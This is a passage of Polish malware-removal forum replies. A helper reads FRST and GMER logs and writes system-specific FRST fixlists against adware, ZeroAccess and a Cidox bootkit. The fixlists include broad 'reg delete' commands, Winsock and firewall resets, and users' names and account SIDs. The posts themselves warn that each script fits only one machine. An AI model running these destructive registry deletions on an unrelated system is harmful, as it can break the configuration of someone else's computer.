"HKLM\SOFTWARE\mozilla\Mozilla Firefox 33.0.1" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale rozszerzenie Adblock Plus trzeba będzie przeinstalować. 4. Zrób nowy log FRST z opcji Scan, zaznacz pole Shortcut, by powstały dwa logi. Dołącz też plik fixlog.txt.

ComboFix to tu nie pomógł, podane logi definitywnie pochodzą z okresu już po jego uruchomieniu, a w systemie nadal jest aktywne adware (prócz tego co powiedziane, także adware "Better Finder" w Firefox). Przyczyna nabycia adware to pobieranie z portali przy użyciu "downloaderów": KLIK. Tu jeden z plików który doprowadził do zagnieżdżenia się większości obiektów: 2015-01-01 16:51 - 2015-01-01 16:51 - 00708320 _____ (komputerswiat.pl) C:\Users\Agnieszka\Downloads\All CPU Meter 4.7.3.exe Przeprowadź następujące działania: 1. Przez Panel sterowania odinstaluj adware Click Caption 1.10.0.5 oraz starą wersję Adobe Flash Player 15 ActiveX. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S2 WindowsMangerProtect; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [473088 2015-01-01] (Fuyu LIMITED) [File not signed] R3 ALSysIO; \??\C:\Users\AGNIES~1\AppData\Local\Temp\ALSysIO.sys [X] R3 catchme; \??\C:\Users\AGNIES~1\AppData\Local\Temp\catchme.sys [X] U3 mbr; \??\C:\ComboFix\mbr.sys [X] Task: {81A20564-DCD9-4860-8CA3-197BD1DD1AD8} - System32\Tasks\Core Temp Autostart Agnieszka => C:\Users\AGNIES~1\AppData\Local\Temp\Rar$EX00.451\Core Temp.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-1399684949-1430651134-2058239177-1004\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-1399684949-1430651134-2058239177-1004\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch BHO: File Sanitizer for HP ProtectTools -> {3134413B-49B4-425C-98A5-893C1F195601} -> C:\Program Files\Hewlett-Packard\File Sanitizer\IEBHO.dll No File FF HKLM\...\Firefox\Extensions: [otis@digitalpersona.com] - C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\FirefoxExt C:\Program Files\ClickCaption_1.10.0.5 C:\Program Files\Opera C:\ProgramData\WindowsMangerProtect C:\Users\Agnieszka\AppData\Local\Opera Software C:\Users\Agnieszka\AppData\Roaming\Opera Software C:\Users\Agnieszka\AppData\Roaming\omiga-plus C:\Users\Agnieszka\AppData\Roaming\WebTest C:\Users\Agnieszka\Downloads\All CPU Meter 4.7.3.exe C:\Users\Agnieszka\Downloads\installspeedfan445_[www.programosy.pl].exe C:\Users\Agnieszka\Downloads\installspeedfan437.exe C:\Users\Agnieszka\Downloads\pobierz-instsf450.exe C:\Users\jape\Desktop\Continue SpeedFan installation.lnk C:\Users\jape\Downloads\*(*)-dp*.exe C:\Users\jape\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\jape\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\KACPER\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 4. W systemie są aż trzy konta: ========================= Accounts: ========================== Agnieszka (S-1-5-21-1399684949-1430651134-2058239177-1004 - Administrator - Enabled) => C:\Users\Agnieszka jape (S-1-5-21-1399684949-1430651134-2058239177-1000 - Administrator - Enabled) => C:\Users\jape KACPER (S-1-5-21-1399684949-1430651134-2058239177-1005 - Limited - Enabled) => C:\Users\KACPER Każde musi zostać sprawdzone z osobna. Zaloguj się po kolei na każde poprzez pełny restart komputera (a nie "Wyloguj" czy "Przełącz użytkownika") i zrób na każdym zestaw logów FRST (główny + Addition, ale bez Shortcut). Na koncie limitowanym KACPER uruchom FRST poprzez dwuklik a nie "Uruchom jako Administrator" (zmieni się kontekst konta). Dołącz też plik fixlog.txt.

Przeprowadź następujące działania: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {abbda6e4-1fdf-45e9-8feb-7ffcdf19a253}Gw64; C:\Windows\System32\drivers\{abbda6e4-1fdf-45e9-8feb-7ffcdf19a253}Gw64.sys [48784 2014-12-26] (StdLib) R3 SPBIUpdd; C:\Program Files\Common Files\ShopperPro\spbiw.sys [41856 2014-12-25] () R2 SPBIUpd; C:\Program Files\Common Files\ShopperPro\spbiu.exe [2346880 2014-12-25] (ShopperPro) S2 Update SourceApp; "C:\Program Files (x86)\SourceApp\updateSourceApp.exe" [X] Task: {091DA62D-6D95-41FA-B7AF-2023BAA7FF6C} - System32\Tasks\ShopperProJSUpd => C:\Program Files (x86)\ShopperPro\updater.exe [2014-12-25] (Goobzo) Task: {2E1B38AA-EB1F-4DDC-B90E-B49BA82DEE75} - System32\Tasks\Installer_iwebar => C:\Users\Dominik\AppData\Local\Installer\Installiwebar_9105\ins_postInst.exe [2014-12-27] () Task: {65BB00BC-E915-4588-8CE1-6880A2AF36D8} - System32\Tasks\ShopperPro => C:\Program Files (x86)\ShopperPro\ShopperPro.exe [2014-12-25] (Goobzo LTD) Task: {9EA83927-78C0-4784-B7EB-74108A37C015} - System32\Tasks\SPBIW_UpdateTask_Time_3830363134393637372d45552a6c505a41574a415734 => Wscript.exe //B "C:\ProgramData\ShopperPro\spbihe.js" spbiu.exe /invoke /f:check_services /l:0 Task: {B3CC3158-245C-4596-A52B-109AE2470534} - System32\Tasks\Installer_sense => C:\Users\Dominik\AppData\Local\Installer\Installsense_24577\ins_postInst.exe [2014-12-27] () HKLM\...\Run: [Launch LCDMon] => "C:\Program Files\Common Files\Logitech\LCD Manager\lcdmon.exe" HKLM-x32\...\Run: [] => [X] GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction BHO: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro64.dll (Goobzo Ltd.) BHO: No Name -> {FCE3FA8B-BA81-467C-81D8-E43C00D1BC71} -> No File BHO-x32: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro.dll (Goobzo Ltd.) FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF HKU\S-1-5-21-361420388-1239155411-725962489-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 C:\Program Files\Common Files\ShopperPro C:\Program Files (x86)\ShopperPro C:\ProgramData\ShopperPro C:\ProgramData\Temp C:\Users\Dominik\AppData\Local\Installer C:\Users\Dominik\Desktop\Programy\DAEMON Tools Lite.lnk C:\Users\Public\Documents\ShopperPro C:\Windows\System32\drivers\{abbda6e4-1fdf-45e9-8feb-7ffcdf19a253}Gw64.sys Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro /f Reg: reg query "HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command" /s Folder: C:\Users\Dominik\AppData\Roaming\Opera Software\Opera Stable\Extensions CMD: type "C:\Users\Dominik\AppData\Roaming\Opera Software\Opera Stable\Preferences" EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Spodziewałam się tego patrząc na podejrzany wyciąg z GMER. Tu nie tylko jest infekcja sterownika serial.sys (modyfikacja ZeroAccess), ale także bootkit - Rootkit.Boot.Cidox.B. Działania wstępne: Z POZIOMU TRYBU AWARYJNEGO: 1. Uruchom TDSSKiller ponownie, jednak tym razem pozostaw wszystkie akcje domyślnie ustawione przez narzędzie i pozwól przeprowadzić leczenie. Zresetuj komputer. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe CreateRestorePoint: DeleteJunctionsInDirectory: C:\WINDOWS\$NtUninstallKB34492$ ShellIconOverlayIdentifiers: [1SecureIconsProvider] -> {FC9D8189-520A-4417-AED7-9EAC810C6FBA} => C:\Documents and Settings\All Users\Dane aplikacji\Microsoft\Secure\Icons\SecureIconsProvider.dll () HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [Otsics] => C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Otsics\tmpD2.exe [145256 2014-10-24] () HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [Ektion] => regsvr32.exe "C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Ektion\kbdcomex54.dll" HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [YjPack] => C:\WINDOWS\system32\regsvr32.exe "C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Otsics\AcroIEHelperShim.DLL" HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [ChromeUpdate] => C:\Documents and Settings\Jarek\Dane aplikacji\FrameworkUpdate\ChromeUpdate.exe [233984 2014-11-26] (Company name goes here) Winlogon\Notify\klogon: C:\WINDOWS\system32\klogon.dll (Kaspersky Lab) BootExecute: autocheck autochk /k:C * S2 SecurityCenterServer4196545509; "C:\WINDOWS\system32\deurge.exe" -service "C:\Documents and Settings\Jarek\Dane aplikacji\Aguhxyro\googy.exe" S2 ASInsHelp; \??\C:\WINDOWS\system32\drivers\AsInsHelp32.sys [X] U3 awdw3w0e; No ImagePath S0 Chl27; No ImagePath S3 ddxgb; \??\C:\DOCUME~1\Jarek\USTAWI~1\Temp\ddxgb.sys [X] S0 Hmq51; No ImagePath S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] S3 Video3D; No ImagePath HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Chl27.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Hmq51.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Chl27.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hmq51.sys => ""="Driver" Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll" Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll" GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = URLSearchHook: HKU\S-1-5-21-1417001333-746137067-839522115-1004 - (No Name) - {bfc39e47-d643-4dc2-aa1d-61377501c844} - No File Toolbar: HKU\.DEFAULT -> No Name - {2E924F4F-67F0-4BD8-9560-49F468E843D2} - No File Handler: vnd.ms.radio - {3DA2AA3B-3D96-11D2-9BD2-204C4F4F5020} - C:\WINDOWS\system32\Msdxm6.ocx (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1417001333-746137067-839522115-1004_Classes\CLSID\{6835F21B-AD12-485C-A8FD-D7DF60C72A69}\InprocServer32 -> wbocx32.ocx No File CustomCLSID: HKU\S-1-5-21-1417001333-746137067-839522115-1004_Classes\CLSID\{6AC91CBD-DB47-406A-AF60-90F8150FA5B8}\InprocServer32 -> wbocx32.ocx No File FF Plugin: @videolan.org/vlc,version=0.8.6h -> C:\Program Files\VideoLAN\VLC\npvlc.dll No File FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\Documents and Settings\All Users\Dane aplikacji\Common Files C:\Documents and Settings\All Users\Dane aplikacji\InstallMate C:\Documents and Settings\All Users\Dane aplikacji\Microsoft\Secure C:\Documents and Settings\All Users\Dane aplikacji\PPLive C:\Documents and Settings\All Users\Dane aplikacji\SecuriSoft SARL C:\Documents and Settings\Jarek\Dane aplikacji\*.exe C:\Documents and Settings\Jarek\Dane aplikacji\.BitTornado C:\Documents and Settings\Jarek\Dane aplikacji\addpcs C:\Documents and Settings\Jarek\Dane aplikacji\Aguhxyro C:\Documents and Settings\Jarek\Dane aplikacji\atube C:\Documents and Settings\Jarek\Dane aplikacji\DAEMON Tools Lite C:\Documents and Settings\Jarek\Dane aplikacji\DMCache C:\Documents and Settings\Jarek\Dane aplikacji\FrameworkUpdate C:\Documents and Settings\Jarek\Dane aplikacji\iliveto C:\Documents and Settings\Jarek\Dane aplikacji\Moyea C:\Documents and Settings\Jarek\Dane aplikacji\Opera Software C:\Documents and Settings\Jarek\Dane aplikacji\PPLive C:\Documents and Settings\Jarek\Dane aplikacji\Publish Providers C:\Documents and Settings\Jarek\Dane aplikacji\Warez C:\Documents and Settings\Jarek\Dane aplikacji\WebCompiler3 C:\Documents and Settings\Jarek\Dane aplikacji\Xi C:\Documents and Settings\Jarek\Dane aplikacji\Ylgyas C:\Documents and Settings\Jarek\Dane aplikacji\Yzwexupa C:\Documents and Settings\Jarek\Pulpit\Icons\Programs\1\DAEMON Tools Pro.lnk C:\Documents and Settings\Jarek\Pulpit\Icons\Programs\1\YASU.exe.lnk C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\~wmrg C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Google\Chrome C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Ektion C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Otsics C:\Program Files\Mozilla Firefox\extensions C:\Program Files\mozilla firefox\plugins C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\WINDOWS\system32\deurge.exe C:\WINDOWS\system32\klogon.dll Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Search Bar" /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v SearchMigratedDefaultName /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v SearchMigratedDefaultURL /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Search" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Internet Explorer\Search" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: netsh winsock reset CMD: dir /a "C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji" CMD: dir /a C:\WINDOWS\$NtUninstallKB34492$ Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Z POZIOMU TRYBU NORMALNEGO: Jeśli wszystko pójdzie dobrze, system powinien poprawnie się uruchomić. Kolejne działania: 1. Przez Dodaj/Usuń programy odinstaluj stare dziurawe wersje Adobe Flash Player 13 ActiveX, Adobe Flash Player 15 Plugin, Java 7 Update 67, Java™ 6 Update 5, Java™ 6 Update 7 oraz scrackowany ESET NOD32 Antivirus + NOD32 v3.0.642 FiX1.2 by TemDono. 2. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie potem przeinstalować. 3. Zrób nowe logi: FRST z opcji Scan (zaznacz ponownie pole Addition, by powstały dwa logi) oraz GMER. Dołącz też plik fixlog.txt.

Nazwy logów sugerują, że wyciągasz je z folderu C:\FRST\Logs. Tam jest archiwum, bieżący log jest zawsze w ścieżce z której uruchamiano FRST, czyli w tym przypadku na Pulpicie. Przeprowadź następujące działania: 1. Odinstaluj odpadki, stare wersje (potem będziemy instalować najnowsze) oraz instalacje sponsorowane: - Przez Dodaj/Usuń programy: Adobe Flash Player 15 ActiveX, Adobe Flash Player 15 Plugin, BitTorrentControl_v12 Toolbar, Java 7 Update 21, McAfee Security Scan Plus. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadkowy wpis Google Update Helper > Dalej. 2. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "http://www.interia.pl/?utm_source=is" FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe HKU\S-1-5-21-1343024091-1336601894-839522115-1003\...\Run: [bgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" S1 ccnfd_1_10_0_4; system32\drivers\ccnfd_1_10_0_4.sys [X] U1 eabfiltr; No ImagePath S3 NMIndexingService; "C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe" [X] S2 Update Faster Light; "C:\Program Files\Faster Light\updateFasterLight.exe" [X] C:\Documents and Settings\All Users\Dane aplikacji\AVG C:\Documents and Settings\All Users\Dane aplikacji\Avg_Update_0814tb C:\Documents and Settings\All Users\Dane aplikacji\Common Files C:\Documents and Settings\All Users\Dane aplikacji\TEMP C:\Documents and Settings\All Users\Menu Start\Programy\Lightworks C:\Documents and Settings\Martyna1\Dane aplikacji\AVG C:\Documents and Settings\Martyna1\Dane aplikacji\IHlpr C:\Documents and Settings\Martyna1\Ustawienia lokalne\Dane aplikacji\Avg C:\Documents and Settings\Martyna1\Ustawienia lokalne\Dane aplikacji\WMTools Downloaded Files C:\Documents and Settings\LocalService\Dane aplikacji\AVG C:\Documents and Settings\LocalService\Ustawienia lokalne\Dane aplikacji\AVG C:\Program Files\Firefox(13108)-dp.exe C:\Program Files\Google Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: sc config "PLAY ONLINE. RunOuc" start= disabled EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Wszystko zrobione. Nie odpowiedziałeś mi na pytanie:

W jaki sposób? Opisz na czym polega "fatalne działanie". Ogólnie na razie mogę tylko tyle stwierdzić, że Firefox jest tu dość przeładowany (dużo wtyczek i rozszerzeń zewnętrznych) oraz są jakieś problemy ze strukturą plików na dysku. Temat migruję do działu Windows. Nie ma tu żadnych oznak infekcji, rysują się inne zagadnienia. Do usunięcia tylko puste wpisy, odpadkowe katalogi po deinstalacjach i zbędne nieczynne polityki wprowadzone przez jakieś narzędzie "resetujące", ale to tylko kosmetyka. Widzę tu inne rodzaje poważniejszych nieinfekcyjnych problemów. Po pierwsze, wygląda na to, że jest tu defekt struktury plików (może być konsekwencją ogólnych problemów z dyskiem). Jest kilka śladów to punktujących, tzn. są tworzone replikacje katalogów kont (np. All Users, All Users.WINDOWS ...) i programów z suffiksami numerycznymi (np. potrójne wystąpienie Flashblock) oznaczające utratę dostępu do poprzednich wystąpień, a także te same katalogi są listowane w raporcie podwójnie co jest oznaką nieprawidłowości, np.: 2014-12-27 13:48 - 2014-12-27 13:48 - 00000000 ____D () C:\Documents and Settings\All Users.WINDOWS\Menu Start\Programy\WinRAR 2014-12-27 13:48 - 2014-12-27 13:48 - 00000000 ____D () C:\Documents and Settings\All Users.WINDOWS\Menu Start\Programy\WinRAR Po drugie, Dziennik zdarzeń sypie błędami modułów Foxit i filtra ffdshow, a także sugeruje niespójność Repozytorium WMI: Application errors: ================== Error: (12/24/2014 11:03:50 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Aplikacja powodująca błąd mpc-hc.exe, wersja 1.7.3.147, moduł powodujący błąd ffdshow.ax, wersja 1.3.4530.0, adres błędu 0x0021be27. Przetwarzanie zdarzenia określonego nośnika dla [mpc-hc.exe!ws!] Error: (12/23/2014 08:54:14 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Aplikacja powodująca błąd drwtsn32.exe, wersja 5.1.2600.0, moduł powodujący błąd dbghelp.dll, wersja 5.1.2600.5512, adres błędu 0x0001295d. Przetwarzanie zdarzenia określonego nośnika dla [drwtsn32.exe!ws!] Error: (12/23/2014 08:54:09 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Aplikacja powodująca błąd explorer.exe, wersja 6.0.2900.5512, moduł powodujący błąd foxitpdfinfo.dll, wersja 1.0.0.903, adres błędu 0x0002f7b8. Przetwarzanie zdarzenia określonego nośnika dla [explorer.exe!ws!] Error: (12/22/2014 07:52:08 PM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Wstępnie: 1. Wykonaj sprawdzanie dysku: Start > Uruchom > cmd, wklep komendę chkdsk /f /r i ENTER, na pytanie o dezinstalację woluminu odpowiedz twierdząco z klawiatury i zresetuj system. Podczas restartu powinno się wykonać sprawdzanie dysku. Start > Uruchom > eventvwr.msc, w sekcji Aplikacja wyszukaj zdarzenie Winlogon numer 1001, pobierz jego Szczegóły, skopiuj je i wklej do posta. 2. Następnie odinstaluj starą wersję Adobe Flash Player 11 ActiveX oraz programy tworzące błędy Foxit PDF Editor, K-Lite Codec Pack 10.4.0 Full. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CMD: rundll32 wbemupgd, UpgradeRepository CMD: netsh firewall reset Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKU\S-1-5-18\Software\Classes /f Reg: reg delete HKU\S-1-5-19\Software\Classes /f Reg: reg delete HKU\S-1-5-20\Software\Classes /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\MenuExt"/f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies /f Reg: reg delete HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies /f Reg: reg delete HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies /f HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-343818398-1757981266-839522115-1003\Software\Classes\.exe: exefile => "%1" %* HKU\S-1-5-21-343818398-1757981266-839522115-1003\Software\Classes\exefile: "%1" %* DPF: {68282C51-9459-467B-95BF-3C0E89627E55} http://www.mks.com.pl/skaner/SkanerOnline.cab FF Keyword.URL: hxxp://www.google.com.my/search?q= FF DefaultSearchEngine: Google Default FF SearchPlugin: C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Mozilla\Firefox\Profiles\7f8o4de8.default-1386175172031\searchplugins\google-default.xml FF Plugin: @IObit.com/np_Asc_Plugin -> C:\Program Files\IObit\Surfing Protection\BrowerProtect\np_Asc_plugin.dll No File S4 LiveUpdateSvc; C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe [X] R3 ALSysIO; \??\C:\DOCUME~1\BERGER~2.XP-\USTAWI~1\Temp\ALSysIO.sys [X] S3 cpuz135; \??\C:\DOCUME~1\BERGER~2.XP-\USTAWI~1\Temp\cpuz135\cpuz135_x32.sys [X] S3 cpuz136; \??\C:\DOCUME~1\BERGER~2.XP-\USTAWI~1\Temp\cpuz136\cpuz136_x32.sys [X] S3 gdrv; \??\C:\WINDOWS\gdrv.sys [X] Task: C:\WINDOWS\Tasks\AVG_SYS_TASK.job => C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\{3C5CBD7B-3D1D-411E-96C2-513FFCA84D2D} C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\188F1432-103A-4ffb-80F1-36B633C5C9E1 C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\ALLPlayer C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\AVG 0214c Campaign C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\AVG2014 C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\ClearCookiesEasy C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\F-Secure C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\HitmanPro C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\IObit C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\MFAData C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\PITy C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\Simply Super Software C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\TEMP C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\VSO C:\Documents and Settings\All Users.WINDOWS\Menu Start\Programy\Powertoys for Windows XP\Tweak UI.lnk C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\AVG 0214c Campaign C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\AVG2014 C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\BinarySense C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\BITS C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\ClearCookiesEasy C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\CrystalIdea Software C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\FlashGet C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\FlashGetBHO C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\FlashgetSetup C:\Documents and 